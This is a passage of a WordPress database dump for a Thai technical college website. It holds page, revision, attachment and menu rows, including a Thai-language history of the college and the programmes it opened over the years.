(944, 3, '2018-02-02 15:26:24', '2018-02-02 08:26:24', '', 'ข้อมูลอาคารและสถานที่', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88', '', '', '2018-02-02 15:26:24', '2018-02-02 08:26:24', '', 0, 'http://www.technicrayong.ac.th/?page_id=944', 0, 'page', '', 0),
(945, 3, '2018-02-02 15:26:24', '2018-02-02 08:26:24', '', 'ข้อมูลอาคารและสถานที่', '', 'inherit', 'closed', 'closed', '', '944-revision-v1', '', '', '2018-02-02 15:26:24', '2018-02-02 08:26:24', '', 944, 'http://www.technicrayong.ac.th/944-revision-v1/', 0, 'revision', '', 0),
(946, 3, '2018-02-02 15:29:27', '2018-02-02 08:29:27', '', 'KM', '', 'publish', 'closed', 'closed', '', 'km', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=946', 98, 'nav_menu_item', '', 0),
(947, 3, '2018-02-05 11:14:06', '2018-02-05 04:14:06', '', '5-2-2561 11-13-28', '', 'inherit', 'closed', 'closed', '', '5-2-2561-11-13-28', '', '', '2018-02-05 11:14:06', '2018-02-05 04:14:06', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg', 0, 'attachment', 'image/jpeg', 0),
(949, 3, '2018-02-05 11:44:14', '2018-02-05 04:44:14', '<h3> <img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1600\" height=\"670\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #0000ff;\">ประวัติวิทยาลัยเทคนิคระยอง</span></h2>\r\n<h4><span style=\"color: #0000ff;\">สถานที่ตั้ง</span> วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000 โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717 มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</h4>\r\n<h4><span style=\"color: #0000ff;\">ความเป็นมา </span><em>เมื่อวันที่ 3 ตุลาคม 2481</em> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง \"โรงเรียนช่างไม้ระยอง\" ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จากนายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</h4>\r\n<h4><span style=\"color: #0000ff;\">ความเป็นมา </span><em>ในปีพ.ศ.2501</em> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น \"โรงเรียน-การช่างไม้ระยอง\" เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม \"โรงเรียนการช่างไม้ระยอง\" และ \"โรงเรียนการช่างสตรีระยอง\" เป็นโรงเรียนเดียวกัน ให้ชื่อว่า \"โรงเรียนการช่างระยอง\" และได้รับอนุมัติให้ชื่อเป็น \"โรงเรียนเทคนิคระยอง\" เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น \"วิทยาลัยเทคนิคระยอง\" ตั้งแต่วันที่ 1 พฤษภาคม 2523จนถึงปัจจุบัน</h4>\r\n<h4></h4>\r\n<h2><span style=\"color: #0000ff;\">การจัดการศึกษา</span></h2>\r\n<h4><em> พ. ศ. 2481</em> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน <em>พ.ศ.2485</em> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน <em>พ.ศ 2492</em> เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน <em>พ. ศ. 2493</em> ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 พ. ศ. 2496 ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง พ. ศ. 2500 เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ พ.ศ. 2503 เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ พ.ศ.2506 เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง พ. ศ. 2513 เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น พ. ศ. 2519 เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน พ. ศ. 2520 เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า พ. ศ. 2522 เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ พ. ศ. 2524 เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.)สาขาเทคนิคอุตสาหกรรมปิโตรเคมี แผนกเทคนิคปฏิบัติการเป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ พ.ศ. 2527 เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยีคหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ พ. ศ. 2532 เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ พ.ศ 2533 เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม พ. ศ. 2534 เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม พ. ศ. 2535 เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม พ. ศ. 2537 เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิคการผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขาวิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-05 11:44:14', '2018-02-05 04:44:14', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(950, 3, '2018-02-05 11:49:33', '2018-02-05 04:49:33', '<h3> <img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1600\" height=\"670\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #0000ff;\">ประวัติวิทยาลัยเทคนิคระยอง</span></h2>\r\n<h4><span style=\"color: #0000ff;\">สถานที่ตั้ง</span> วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000 โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717 มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</h4>\r\n<h4><span style=\"color: #0000ff;\">ความเป็นมา </span><em>เมื่อวันที่ 3 ตุลาคม 2481</em> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง \"โรงเรียนช่างไม้ระยอง\" ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จากนายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</h4>\r\n<h4><span style=\"color: #0000ff;\">ความเป็นมา </span><em>ในปีพ.ศ.2501</em> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น \"โรงเรียน-การช่างไม้ระยอง\" เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม \"โรงเรียนการช่างไม้ระยอง\" และ \"โรงเรียนการช่างสตรีระยอง\" เป็นโรงเรียนเดียวกัน ให้ชื่อว่า \"โรงเรียนการช่างระยอง\" และได้รับอนุมัติให้ชื่อเป็น \"โรงเรียนเทคนิคระยอง\" เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น \"วิทยาลัยเทคนิคระยอง\" ตั้งแต่วันที่ 1 พฤษภาคม 2523จนถึงปัจจุบัน</h4>\r\n<h4></h4>\r\n<h2><span style=\"color: #0000ff;\">การจัดการศึกษา</span></h2>\r\n<h4><em> พ. ศ. 2481</em> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน <em>พ.ศ. 2485</em> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน <em>พ.ศ 2492</em> เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน <em>พ.ศ. 2493</em> ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 <em> พ.ศ. 2496 </em> ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง <em>พ. ศ. 2500 </em> เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ <em> พ.ศ. 2503</em> เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ <em>พ.ศ. 2506 </em> เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง <em>พ.ศ. 2513</em> เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น <em>พ.ศ. 2519</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน <em>พ.ศ. 2520</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า <em> พ.ศ. 2522</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ <em>พ.ศ. 2524</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.)สาขาเทคนิคอุตสาหกรรมปิโตรเคมี แผนกเทคนิคปฏิบัติการเป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ <em>พ.ศ. 2527</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยีคหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ <em>พ.ศ. 2532</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ <em>พ.ศ 2533</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม <em>พ.ศ. 2534</em> เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม <em>พ.ศ. 2535</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม <em>พ.ศ. 2537</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิคการผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขาวิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-05 11:49:33', '2018-02-05 04:49:33', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(951, 3, '2018-02-05 11:54:11', '2018-02-05 04:54:11', '<h3> <img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1600\" height=\"670\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #0000ff;\">ประวัติวิทยาลัยเทคนิคระยอง</span></h2>\r\n<h4><span style=\"color: #0000ff;\">สถานที่ตั้ง</span> วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000 โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717 มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</h4>\r\n<h4><span style=\"color: #0000ff;\">ความเป็นมา </span><em>เมื่อวันที่ 3 ตุลาคม 2481</em> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง \"โรงเรียนช่างไม้ระยอง\" ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จากนายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</h4>\r\n<h4><span style=\"color: #0000ff;\">ความเป็นมา </span><em>ในปีพ.ศ.2501</em> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น \"โรงเรียน-การช่างไม้ระยอง\" เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม \"โรงเรียนการช่างไม้ระยอง\" และ \"โรงเรียนการช่างสตรีระยอง\" เป็นโรงเรียนเดียวกัน ให้ชื่อว่า \"โรงเรียนการช่างระยอง\" และได้รับอนุมัติให้ชื่อเป็น \"โรงเรียนเทคนิคระยอง\" เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น \"วิทยาลัยเทคนิคระยอง\" ตั้งแต่วันที่ 1 พฤษภาคม 2523จนถึงปัจจุบัน</h4>\r\n<h4></h4>\r\n<h2><span style=\"color: #0000ff;\">การจัดการศึกษา</span></h2>\r\n<h4><em> พ. ศ. 2481</em> เปิดการสอนระดับอาชีวศึกษาชั้นต้น หลักสูตร 3 ปี รับผู้จบประโยคประถมศึกษา(ป.4) เข้าเรียนแผนกช่างไม้ และมีนักเรียนรุ่นแรก 34 คน <em>พ.ศ. 2485</em> เปิดสอนแผนกช่างตัดผม หลักสูตร 2 ปี แล้วยุบไป เพราะไม่มีนักเรียนสมัครเข้าเรียน <em>พ.ศ 2492</em> เปิดสอนแผนกช่างตัดผมครั้งที่ 2 และขยายห้องเรียนแผนกช่างไม้ ปีที่ 1 เพิ่มเป็น 3 ห้องเรียน <em>พ.ศ. 2493</em> ยุบแผนกช่างตัดผมเป็นครั้งที่ 2 <em>พ.ศ. 2496 </em> ขยายการศึกษาถึงระดับมัธยมศึกษาตอนปลาย รับผู้จบชั้นมัธยมอาชีวศึกษาตอนต้นและรับผู้จบชั้นมัธยมปีที่ 3 สายสามัญ หลักสูตร 3 ปี แผนกช่างไม้ปลูกสร้าง <em>พ. ศ. 2500 </em> เปิดสอนระดับมัธยมอาชีวศึกษาตอนปลาย แผนกช่างยนต์ <em> พ.ศ. 2503</em> เปิดสอนระดับอาชีวะชั้นสูง แผนกช่างไม้ปลูกสร้าง และยุบแผนกช่างยนต์ <em>พ.ศ. 2506 </em> เปิดสอนแผนกช่างยนต์ครั้งที่ 2 เปิดสอนระดับมัธยมศึกษาตอนปลาย (ม.4-6) สายอาชีพ แผนกช่างก่อสร้าง <em>พ.ศ. 2513</em> เปิดสอนระดับมัธยมศึกษาตอนปลาย แผนกช่างเชื่อมโลหะแผ่น <em>พ.ศ. 2519</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างกลโรงงาน <em>พ.ศ. 2520</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกช่างไฟฟ้า <em>พ.ศ. 2522</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) แผนกพณิชยการ <em>พ.ศ. 2524</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.)สาขาเทคนิคอุตสาหกรรมปิโตรเคมี แผนกเทคนิคปฏิบัติการเป็นหลักสูตร 2 ปี รับผู้จบมัธยมศึกษาตอนปลาย (มศ.5) สายวิทยาศาสตร์ <em>พ.ศ. 2527</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาการบัญชี สาขาเทคโนโลยีคหกรรมศาสตร์ และสาขาเทคนิคยานยนต์ <em>พ.ศ. 2532</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพเทคนิค (ปวท.) สาขาเทคนิคเคมีอุตสาหกรรม เปิดสอนระดับประกาศนียบัตรวิชาชีพ (ปวช.) สาขาช่างอิเล็กทรอนิกส์ <em>พ.ศ 2533</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาการตลาด และสาขาวิชาเครื่องมือวัดและควบคุมในอุตสาหกรรม <em>พ.ศ. 2534</em> เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการช่างฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม <em>พ.ศ. 2535</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) สาขาวิชาช่างอิเล็กทรอนิกส์ สาขางานอิเล็กทรอนิกส์อุตสาหกรรม เปิดสอนระดับช่างชำนาญงานระบบทวิภาคี (Dual-System) ตามโครงการฝึกหัดไทย-เยอรมัน สาขาวิชาธุรกิจโรงแรม <em>พ.ศ. 2537</em> เปิดสอนระดับประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) 7 สาขา คือ สาขาวิชาช่างเทคนิคการผลิต สาขางานเครื่องกล สาขาช่างเทคนิคโลหะการ สาขางานเทคนิคงานเชื่อมอุตสาหกรรม สาขาวิชาช่างไฟฟ้ากำลัง สาขางานติดตั้งและควบคุม สาขาวิชาช่างก่อสร้าง สาขางานเทคนิคการก่อสร้าง สาขาวิชาคหกรรมธุรกิจ สาขาวิชาอาหารและโภชนาการ สาขาวิชาผ้าและเครื่องแต่งกาย</h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-05 11:54:11', '2018-02-05 04:54:11', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(952, 3, '2018-02-05 14:10:28', '2018-02-05 07:10:28', '', '5-2-2561 14-10-53', '', 'inherit', 'closed', 'closed', '', '5-2-2561-14-10-53', '', '', '2018-02-05 14:10:28', '2018-02-05 07:10:28', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg', 0, 'attachment', 'image/jpeg', 0),
(953, 3, '2018-02-05 14:10:31', '2018-02-05 07:10:31', '', '5-2-2561 14-11-26', '', 'inherit', 'closed', 'closed', '', '5-2-2561-14-11-26', '', '', '2018-02-05 14:10:31', '2018-02-05 07:10:31', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(954, 3, '2018-02-05 14:10:33', '2018-02-05 07:10:33', '', '5-2-2561 14-11-46', '', 'inherit', 'closed', 'closed', '', '5-2-2561-14-11-46', '', '', '2018-02-05 14:10:33', '2018-02-05 07:10:33', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg', 0, 'attachment', 'image/jpeg', 0),
(955, 3, '2018-02-05 14:16:39', '2018-02-05 07:16:39', '<h3> <img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n<h4><img class=\"alignleft wp-image-952\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /></h4>\r\n<h4><img class=\"alignleft wp-image-953\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /></h4>\r\n<img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-05 14:16:39', '2018-02-05 07:16:39', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(956, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'ประวัติวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=956', 16, 'nav_menu_item', '', 0),
(957, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'วิสัยทัศน์ (Vision)', '', 'publish', 'closed', 'closed', '', '%e0%b8%a7%e0%b8%b4%e0%b8%aa%e0%b8%b1%e0%b8%a2%e0%b8%97%e0%b8%b1%e0%b8%a8%e0%b8%99%e0%b9%8c-vision', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=957', 17, 'nav_menu_item', '', 0),
(958, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'พันธกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b8%81%e0%b8%b4%e0%b8%88', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=958', 18, 'nav_menu_item', '', 0),
(959, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'ปรัชญาวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b1%e0%b8%8a%e0%b8%8d%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=959', 19, 'nav_menu_item', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(960, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'เอกลักษณ์วิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%ad%e0%b8%81%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=960', 20, 'nav_menu_item', '', 0),
(961, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'อัตลักษณ์วิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=961', 21, 'nav_menu_item', '', 0),
(962, 3, '2018-02-06 09:23:59', '2018-02-06 02:23:59', '', 'แผนที่ตั้งวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%95%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=962', 22, 'nav_menu_item', '', 0),
